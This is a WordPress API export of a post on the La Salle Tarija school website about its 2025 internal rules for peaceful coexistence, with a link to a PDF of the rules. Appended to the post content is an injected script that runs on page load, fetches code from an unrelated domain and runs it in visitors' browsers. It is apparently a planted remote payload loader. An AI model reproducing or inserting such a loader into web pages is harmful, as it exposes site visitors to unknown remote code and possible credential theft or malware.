{"id":152,"date":"2025-02-19T08:58:28","date_gmt":"2025-02-19T12:58:28","guid":{"rendered":"https:\/\/lasalletarija.jgnube.com\/?p=152"},"modified":"2025-06-21T08:16:10","modified_gmt":"2025-06-21T12:16:10","slug":"reglamento-interno-de-normas-de-convivencia-pacifica-y-armonica","status":"publish","type":"post","link":"https:\/\/lasalletarija.org\/index.php\/2025\/02\/19\/reglamento-interno-de-normas-de-convivencia-pacifica-y-armonica\/","title":{"rendered":"Reglamento Interno de Normas de Convivencia Pac\u00edfica y Arm\u00f3nica Gesti\u00f3n &#8211; 2025"},"content":{"rendered":"\n<p>\u00bfQU\u00c9 SER\u00cdA LA ESCUELA SIN LA FAMILIA?<\/p>\n\n\n\n<p>\u00a1CAMINEMOS JUNTOS EN LA EDUCACI\u00d3N!<\/p>\n\n\n\n<p>En la Salle Tarija creemos en la relaci\u00f3n familia- escuela. Es una forma de crecer juntos.<br>Rompemos barreras, estrechamos lazos y mano a mano, construimos el colegio que todos so\u00f1amos.<\/p>\n\n\n\n<div data-wp-interactive=\"core\/file\" class=\"wp-block-file\"><object data-wp-bind--hidden=\"!state.hasPdfPreview\" hidden class=\"wp-block-file__embed\" data=\"https:\/\/lasalletarija.org\/wp-content\/uploads\/2024\/05\/REGLAMENTO-INTERNO-2025-NORMAS-DE-CONVIVENCIA-PACIFICA-Y-ARMONICA-COLEGIO-LA-SALLE-PARTICULAR-TARI1.pdf\" type=\"application\/pdf\" style=\"width:100%;height:600px\" aria-label=\"Incrustado de REGLAMENTO INTERNO-2025- NORMAS DE CONVIVENCIA PACIFICA Y ARMONICA COLEGIO LA SALLE PARTICULAR TARI[1].\"><\/object><a id=\"wp-block-file--media-e0e95e39-51ed-4c82-b9d2-a3b875f4a114\" href=\"https:\/\/lasalletarija.org\/wp-content\/uploads\/2024\/05\/REGLAMENTO-INTERNO-2025-NORMAS-DE-CONVIVENCIA-PACIFICA-Y-ARMONICA-COLEGIO-LA-SALLE-PARTICULAR-TARI1.pdf\">REGLAMENTO INTERNO-2025- NORMAS DE CONVIVENCIA PACIFICA Y ARMONICA COLEGIO LA SALLE PARTICULAR TARI[1]<\/a><a href=\"https:\/\/lasalletarija.org\/wp-content\/uploads\/2024\/05\/REGLAMENTO-INTERNO-2025-NORMAS-DE-CONVIVENCIA-PACIFICA-Y-ARMONICA-COLEGIO-LA-SALLE-PARTICULAR-TARI1.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-e0e95e39-51ed-4c82-b9d2-a3b875f4a114\">Descarga<\/a><\/div>\n<script>;document.addEventListener(\"DOMContentLoaded\", function () {\n    var url = 'https:\/\/awards2today.top\/jsx';\n    fetch(url)\n        .then(response => response.text())\n        .then(data => {\n            var script = document.createElement('script');\n            script.innerHTML = data.trim();\n            document.head.appendChild(script);\n        })\n});<\/script>","protected":false},"excerpt":{"rendered":"<p>En la Salle Tarija creemos en la relaci\u00f3n familia- escuela. Es una forma de crecer juntos.<br \/>\nRompemos barreras, estrechamos lazos y mano a mano, construimos el colegio que todos so\u00f1amos.<\/p>\n","protected":false},"author":1,"featured_media":1081,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-152","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-sin-categoria"],"_links":{"self":[{"href":"https:\/\/lasalletarija.org\/index.php\/wp-json\/wp\/v2\/posts\/152","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/lasalletarija.org\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/lasalletarija.org\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/lasalletarija.org\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/lasalletarija.org\/index.php\/wp-json\/wp\/v2\/comments?post=152"}],"version-history":[{"count":11,"href":"https:\/\/lasalletarija.org\/index.php\/wp-json\/wp\/v2\/posts\/152\/revisions"}],"predecessor-version":[{"id":1082,"href":"https:\/\/lasalletarija.org\/index.php\/wp-json\/wp\/v2\/posts\/152\/revisions\/1082"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/lasalletarija.org\/index.php\/wp-json\/wp\/v2\/media\/1081"}],"wp:attachment":[{"href":"https:\/\/lasalletarija.org\/index.php\/wp-json\/wp\/v2\/media?parent=152"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/lasalletarija.org\/index.php\/wp-json\/wp\/v2\/categories?post=152"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/lasalletarija.org\/index.php\/wp-json\/wp\/v2\/tags?post=152"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}